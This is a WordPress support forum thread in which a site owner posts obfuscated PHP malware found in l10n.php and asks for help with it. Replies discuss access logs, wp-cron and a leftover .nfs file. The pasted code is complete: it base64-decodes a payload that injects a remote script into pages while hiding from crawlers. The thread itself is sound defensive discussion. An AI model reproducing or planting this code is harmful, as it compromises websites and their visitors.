• I opened the l10n.php and found this encrypted code at the top of the file. It seemed malicious so i deleted this section immediately. Can someone help me decode this one?

    <?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21ybm8nXSkpeyAgICRHTE9CQUxTWydtcm5vJ109MTsgICBpZighZnVuY3Rpb25fZXhpc3RzKCdjcm9wZXJ4JykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2FkZHhpdCcpKXsgICAgIGZ1bmN0aW9uIGFkZHhpdCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJuTnZiVzVwWVdKdmJHUnBibVp2YjNKbkxtTnZiUzlzYkM1d2FIQS9hejB4SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gY3JvcGVyeCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsYWRkeGl0KCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuYWRkeGl0KCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ2Nyb3BlcngnKTsgICB9ICB9"));$_8b7b1f56();?>

Viewing 9 replies - 31 through 39 (of 39 total)
  • 125.5.38.115 – IP ADdress accessing

    – [02/Nov/2010:23:58:23 -0700] time and date file was accessed

    “GET sugod.com/actor-kirk-abella-mistakenly-shot-dead-in-cebu/
    File being accessed

    HTTP/1.1″ 200 17730 not sure really, never needed to know

    http://www.google.com.ph/search?client=firefox-a&rls=org.mozilla:en-US:official&channel=s&hl=tl&q=Kirk+Abella&um=1&biw=1280&bih=857&ie=UTF-8&sa=N&tab=iw&#8221; referring source, this was a google search

    “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 ( .NET CLR 3.5.30729)”
    User info…. browser, etc

    I’m pretty sure GET items aren’t to be worried about. POST items are to be worried about. (not always, there are legitimate POST items..most are legitimate….but if something is writing to your files it will use POST)

    When investigating access logs, I had one issue. The time stamp of my files, and the access logs were different timezones. I had to adjust accordingly. Mine was off by 4 hours

    Thread Starter cipals15

    (@cipals15)

    I have found some of those POST logs:

    a. 97.74.180.1 – – [02/Nov/2010:00:10:04 -0700] “POST sugod.com/lyrics/wp-cron.php?doing_wp_cron HTTP/1.0” 200 – “-” “WordPress/3.0.1; http://sugod.com/lyrics&#8221;

    b. 97.74.180.1 – – [02/Nov/2010:00:24:33 -0700] “POST sugod.com/lyrics/wp-cron.php?doing_wp_cron HTTP/1.0” 200 – “-” “WordPress/3.0.1; http://sugod.com/lyrics&#8221;

    c. 97.74.180.1 – – [02/Nov/2010:00:27:57 -0700] “POST sugod.com/lyrics/wp-cron.php?doing_wp_cron HTTP/1.0” 200 – “-” “WordPress/3.0.1; http://sugod.com/lyrics&#8221;

    d. 97.74.180.1 – – [02/Nov/2010:00:34:59 -0700] “POST sugod.com/wp-cron.php?doing_wp_cron HTTP/1.0” 200 – “-” “WordPress/3.0.1; http://sugod.com&#8221;

    e. 97.74.180.1 – – [02/Nov/2010:00:36:28 -0700] “POST sugod.com/wp-cron.php?doing_wp_cron HTTP/1.0” 200 – “-” “WordPress/3.0.1; http://sugod.com&#8221;

    With these samples. It seemed that wp-cron is doing something. Please further explain this. Thanks.

    wp-cron is a function of wordpress, it’s not an issue. It handles scheduled wordpress stuff

    Jeez cipals15 you’re going about this the hard way. Just call your host and they will run a script that will clean your entire site in less than 5 minutes. Also the hackers are fairly good so the logs were cleaned behind them. The intial attack was SQL Injection with multiple payloads after the initial injection was successfully made. Since you’re doing research on this I already put together some research on these particular attacks. Instead of plugging my own site with a link here, which I always love to do. LOL Just do a search using this search term “website hack report november” – got a #1 page postition ranking….for now. 😉
    Thanks,
    Ed

    Thread Starter cipals15

    (@cipals15)

    I have contacted them. They said they have run a script to remove it. However, there were remnants of the attack that i have seen which i think was not deleted by script they used.

    A certain file in the cache folder so i deleted it immediately. That’s the same file i found to be malicious on wp-includes/ folder.

    Anyway, i love doing it the hardway. I will learn alot through it. Thanks for the hack report. Yeah. You were ‘no. 1’ in search results.

    Thread Starter cipals15

    (@cipals15)

    UPDATE:

    Found the possible backdoor file. ( .nfs00000000010fea6a000647f3 ) Please confirm if this is a malicious file or a false positive.

    I have grabbed a copy and deleted the file on the server.

    It might be an important WordPress file.

    Hmm I’d be interested in looking at it. Email it to info[at]ait-pro[dot]com.
    .nfs files are UNIX/Linux files. Can’t say that I have much experience with .nfs files – I found this info on the web.

    “Under unix, if you remove a file that a currently running process still has open, the file isn’t really removed. Once the process closes the file, the OS then removes the file handle and frees up the disk blocks. This process is complicated slightly when the file that is open and removed is on an NFS mounted filesystem. Since the process that has the file open is running on one machine (such as a workstation in your office or lab) and the files are on the file server, there has to be some way for the two machines to communicate information about this file. The way NFS does this is with the .nfsNNNN files. If you try to remove one of these file, and the file is still open, it will just reappear with a different number. So, in order to remove the file completely you must kill the process that has it open.”

    Thanks,
    Ed

    Thread Starter cipals15

    (@cipals15)

    Ok. I have already sent it to your email.

    Please get back to me for possible discoveries. Our IT team was also interested with the file. Weirdos! LOL…

    ha ha yeah I’m an IT guy – we’re all like that LOL. Sent the converted file back to you.

    Interesting. Like I said I don’t know a whole lot about .nfs files, but this file contains the original injected script and your theme’s stylesheet. As far as a backdoor goes there is no additional code added in this file so in a way it is just a snapshot of the original attack. Now I don’t know if this could be relaunched all over again by an .nfs file, but it is worth looking into. I’ll have to learn more about what an .nfs file does in general and if what I said is even a possibility at all.

    Thanks,
    Ed

Viewing 9 replies - 31 through 39 (of 39 total)

The topic ‘Found some malicious code inside l10n.php’ is closed to new replies.